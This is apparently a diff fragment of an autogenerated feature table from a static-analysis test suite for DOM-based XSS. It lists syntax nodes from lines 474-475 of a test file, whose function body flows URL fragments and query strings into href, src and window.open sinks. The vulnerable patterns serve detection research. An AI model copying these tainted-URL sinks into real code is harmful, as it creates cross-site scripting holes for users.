autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | $("#foo") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | exceptional return of $("#foo") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | exceptional return of $("#foo") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:16 | $("#foo").attr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:16 | $("#foo").attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:16 | $("#foo").attr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:16 | $("#foo").attr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:16 | $("#foo").attr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | $("#foo ... ", url) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | $("#foo ... ", url) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | $("#foo ... ", url) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | $("#foo ... ", url) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | $("#foo ... ", url) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | exceptional return of $("#foo ... ", url) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | exceptional return of $("#foo ... ", url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | exceptional return of $("#foo ... ", url) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | exceptional return of $("#foo ... ", url) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:3:474:29 | exceptional return of $("#foo ... ", url) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17822,6 +123651,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:474:5:474:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:474:13:474:16 | attr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:474:13:474:16 | attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:474:13:474:16 | attr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:474:13:474:16 | attr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:474:13:474:16 | attr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:474:18:474:23 | "href" | CalleeFlexibleAccessPath | $().attr | | autogenerated/Xss/DomBasedXss/tst.js:474:18:474:23 | "href" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:474:18:474:23 | "href" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17836,6 +123670,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:474:26:474:28 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:474:26:474:28 | url | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:474:26:474:28 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:3 | $ | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:3 | $ | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | $("#foo") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | $("#foo") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | exceptional return of $("#foo") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | exceptional return of $("#foo") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:16 | $("#foo").attr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:16 | $("#foo").attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:16 | $("#foo").attr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:16 | $("#foo").attr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:16 | $("#foo").attr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | $("#foo ... : url}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | $("#foo ... : url}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | $("#foo ... : url}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | $("#foo ... : url}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | $("#foo ... : url}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | exceptional return of $("#foo ... : url}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | exceptional return of $("#foo ... : url}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | exceptional return of $("#foo ... : url}) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | exceptional return of $("#foo ... : url}) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:3:475:29 | exceptional return of $("#foo ... : url}) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17843,6 +123707,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:475:5:475:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:13:475:16 | attr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:13:475:16 | attr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:13:475:16 | attr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:13:475:16 | attr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:13:475:16 | attr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | CalleeFlexibleAccessPath | $().attr | | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17850,6 +123719,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:475:18:475:28 | {href: url} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:22 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:22 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:22 | href | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:22 | href | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:22 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:475:19:475:27 | href: url | fileImports | ansi-to-html | | 